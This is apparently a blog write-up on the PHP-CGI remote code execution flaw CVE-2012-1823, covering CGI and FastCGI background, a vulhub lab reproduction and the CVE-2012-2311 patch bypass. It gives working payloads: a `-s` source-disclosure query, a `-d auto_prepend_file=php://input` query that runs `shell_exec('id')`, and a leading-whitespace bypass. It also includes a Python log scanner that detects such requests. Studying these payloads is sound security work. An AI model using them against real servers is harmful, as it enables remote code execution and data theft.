PHP-CGI remote code execution vulnerability (CVE-2012-1823)

Vulnerability introduction

Vulnerability analysis
PHP SAPI and modes of operation
The PHP source tree contains a directory named sapi. A SAPI acts as a kind of "relay" for PHP: in PHP-FPM, for example, its job is to accept the data that the web container has wrapped in the FastCGI protocol and hand it to the PHP interpreter. Apart from FPM, the most common SAPI is probably Apache's mod_php, which handles the data exchange between PHP and Apache.

php-cgi is one such SAPI. In the early days web applications worked very simply: after receiving an HTTP request, the web container located the file (the CGI script) the user asked for, forked a child process (the interpreter) to execute it, took the output and returned it directly to the user, after which the interpreter child process exited. Web applications written in Bash, Perl and similar languages mostly ran this way, and this execution model is generally called CGI. A default Apache installation has a cgi-bin directory that was originally meant to hold such CGI scripts.

CGI mode has a fatal flaw: creating and scheduling processes costs resources, and the number of processes is not unlimited. A site that receives many requests therefore normally does not run in CGI mode; otherwise every request spawns a child process and the server may collapse. This is why FastCGI appeared: a FastCGI process keeps running in the background, receives request data through the FastCGI protocol, returns the result after execution, and does not exit.

PHP ships a SAPI called php-cgi, which serves two purposes: it provides the CGI interaction mode and it provides the FastCGI interaction mode. In other words, just as with Perl, the web container can directly fork a php-cgi process to execute a PHP script; alternatively, php-cgi can be kept running in the background with `php-cgi -b 127.0.0.1:9000` (php-cgi acting as the FastCGI manager), and the web container talks to port 9000 using the FastCGI protocol.

So what is the FPM mentioned earlier, and why does PHP have two FastCGI managers? PHP does indeed have two: php-cgi can run in FastCGI mode, and FPM also runs in FastCGI mode. FPM, however, was only introduced in the later PHP 5.3 releases and is a more efficient FastCGI manager, so more and more web applications now use php-fpm to run PHP.

CVE-2012-1823 is a vulnerability in this php-cgi SAPI. As described above, php-cgi offers two run modes, CGI and FastCGI; the vulnerability only occurs when PHP runs in CGI mode.

Put simply, the query string of the user's request is passed to php-cgi as command-line parameters, which leads to a whole series of consequences.

As for the underlying principle: RFC 3875 stipulates that when the query string contains no `=` character, the web server passes the decoded query string to the CGI program as command-line arguments, and Apache implements exactly this behaviour.

Vulnerability reproduction

The vulhub vulnerability test environment is used for the reproduction.

Enter the vulnerability environment directory:

    cd vulhub-master/php/CVE-2012-1823

Build the environment:

    docker-compose build

Start the environment:

    docker-compose up -d

Then access the target address `http://ip:8080`.

Vulnerability test

Access `http://ip:8080/index.php?-s`; if the PHP source code of the page is returned, the vulnerability exists.

Exploitation

Reading the source code shows that in CGI mode the following command-line parameters can be controlled through the query string:

    -c  specify the location of the php.ini file
    -n  do not load the php.ini file
    -d  specify a configuration item
    -b  start a FastCGI process
    -s  display the source of the file
    -T  execute the file the specified number of times
    -h and -?  display help

Clearly the easiest option is `-s`, which displays the source code.

Arbitrary code execution

By using `-d` to set auto_prepend_file, an arbitrary file inclusion is created, which leads to arbitrary code execution:

Capture the request with Burp Suite, then modify the packet by appending the following after `index.php`:

    ?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3A//input

and send `<?php echo shell_exec("id"); ?>` as the request body.

As can be seen in the response, the code in the body has been executed and its result is returned.

Principle analysis

PHP is a powerful language, and php.ini has two interesting configuration items: auto_prepend_file and auto_append_file.

auto_prepend_file tells PHP to include the specified file before executing the target file; auto_append_file tells PHP to include the specified file after the target file has finished executing.

This is very interesting: suppose we set auto_prepend_file to php://input; then, before any PHP file is executed, the POST body is included first. So we only need to place the code to be executed in the request body and it will run. (Of course, allow_url_include, the option that allows remote files to be included, also needs to be turned on.)

So how do we set the value of auto_prepend_file?

This involves two PHP-FPM environment variables, PHP_VALUE and PHP_ADMIN_VALUE. Both are used to set PHP configuration items: PHP_VALUE can set options whose changeable mode is PHP_INI_USER or PHP_INI_ALL, while PHP_ADMIN_VALUE can set all options. (The exception is disable_functions: PHP evaluates this option at load time, and the functions it lists are simply never loaded into the PHP context.)

Therefore the environment variables we finally pass are:

    {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'GET',
        'SCRIPT_FILENAME': '/var/www/html/index.php',
        # further entries are truncated in the original post
    }
CVE-2012-2311

After this vulnerability was disclosed, PHP released the patched versions 5.4.2 and 5.3.12, but the fix was incomplete and could be bypassed, which gave rise to CVE-2012-2311.

PHP's fix added the following check:

    if((query_string = getenv("QUERY_STRING"))) {
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        if(*decoded_query_string == '-' && strchr(decoded_query_string, '=') == NULL) {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }
As can be seen, the query string is obtained and URL-decoded; if its first character is `-`, skip_getopt is set, i.e. the command-line parameters are not parsed.

The unsafe part of this fix shows when operations staff have wrapped php-cgi in a shell script like this one:

    #!/bin/sh
    exec /usr/local/bin/php-cgi $*

Parameters can then still be passed by putting whitespace in front of the `-`: the first character of the query string is now whitespace rather than `-`, so the check above does not fire, while the unquoted `$*` in the wrapper is subject to shell word splitting, which discards the leading whitespace before php-cgi ever sees the argument.

PHP 5.4.3 and 5.3.13 therefore modified the check again:

    if((query_string = getenv("QUERY_STRING")) != NULL && strchr(query_string, '=') == NULL) {
        /* we've got query string that has no = - apache CGI will pass it to command line */
        unsigned char *p;
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        for (p = decoded_query_string; *p && *p <= ' '; p++) {
            /* skip all leading spaces */
        }
        if(*p == '-') {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }

This skips all leading whitespace (every character less than or equal to a space) and only then checks whether the first character is `-`.
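The two checks above and the wrapper-script bypass, as an added example in Python (not code from the original post, from vulhub or from PHP itself): it models the 5.4.2/5.3.12 check and the 5.4.3/5.3.13 check as shown in the C excerpts, simulates what `exec php-cgi $*` does to the argument list, and reuses the final check as a rule over a few constructed Apache access-log lines, reporting which php-cgi builds would still have handed each query string to getopt. Reading the two excerpts side by side also shows that the first check looks for `=` in the decoded string while the second looks in the raw one, and the model reproduces that difference. The function names, the log lines and the client addresses are all made up for this example.

```python
# Added example (not from the original post or from PHP itself): a model of the
# two php-cgi query-string checks, the `$*` wrapper effect, and a log-scanning rule.
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines; the addresses and requests are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2019:10:00:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Aug/2019:10:00:01 +0000] "GET /index.php?-s HTTP/1.1" 200 1440 "-" "curl/7.64.0"',
    '10.0.0.9 - - [12/Aug/2019:10:00:02 +0000] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3A//input HTTP/1.1" 200 73 "-" "python-requests/2.22"',
    '10.0.0.9 - - [12/Aug/2019:10:00:03 +0000] "GET /index.php?%20-s HTTP/1.1" 200 1440 "-" "curl/7.64.0"',
    '10.0.0.7 - - [12/Aug/2019:10:00:04 +0000] "GET /about.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

# Client, timestamp, request line and status of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)


def php_url_decode(s):
    """Mirror php_url_decode(): '+' becomes a space and %XX sequences are decoded."""
    return unquote(s.replace("+", " "))


def skip_getopt_first_fix(query_string):
    """Check from PHP 5.4.2 / 5.3.12: decode first, then require a leading '-'
    and no '=' anywhere in the *decoded* string."""
    decoded = php_url_decode(query_string)
    return decoded.startswith("-") and "=" not in decoded


def skip_getopt_second_fix(query_string):
    """Check from PHP 5.4.3 / 5.3.13: the '=' test moves to the *raw* string,
    and leading bytes <= ' ' are skipped before looking for '-'."""
    if "=" in query_string:
        return False
    decoded = php_url_decode(query_string)
    i = 0
    while i < len(decoded) and decoded[i] <= " ":
        i += 1
    return i < len(decoded) and decoded[i] == "-"


def argv_via_wrapper(query_string):
    """Simulate `exec /usr/local/bin/php-cgi $*`: Apache passes each '+'-separated,
    percent-decoded word as one argument, and the unquoted $* lets the shell
    re-split those words on whitespace, dropping any leading spaces."""
    apache_argv = [unquote(word) for word in query_string.split("+")]
    shell_words = []
    for arg in apache_argv:
        shell_words.extend(arg.split())
    return shell_words


def affected_builds(query_string):
    """Which php-cgi builds would still hand this query string to getopt.
    Returns () when the string is not option-like (the final check would not
    skip getopt, or the string contains '=' and is never passed as arguments)."""
    if not skip_getopt_second_fix(query_string):
        return ()
    builds = ["unpatched"]
    if not skip_getopt_first_fix(query_string):
        builds.append("5.4.2/5.3.12")
    return tuple(builds)


def scan_access_log(lines):
    """Flag requests whose query string is option-like; each finding is
    (client, request target, builds that would parse it as options)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        query = m.group("target").split("?", 1)[1]
        builds = affected_builds(query)
        if builds:
            findings.append((m.group("client"), m.group("target"), builds))
    return findings


if __name__ == "__main__":
    for client, target, builds in scan_access_log(SAMPLE_LOG):
        print(f"{client} {target} -> parsed as options by: {', '.join(builds)}")
```

Run as a script it lists the three option-like requests from the constructed log; `?page=1` is never flagged because Apache only passes a query string without `=` as arguments, and `?%20-s` is flagged as reaching getopt on the first-fix builds only because the wrapper strips the leading space that the 5.4.2 check relied on.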

Reference links:

[https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html](https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html)
[https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823#cve-2012-2311](https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823#cve-2012-2311)


Source: www.cnblogs.com/riginal/p/11314565.html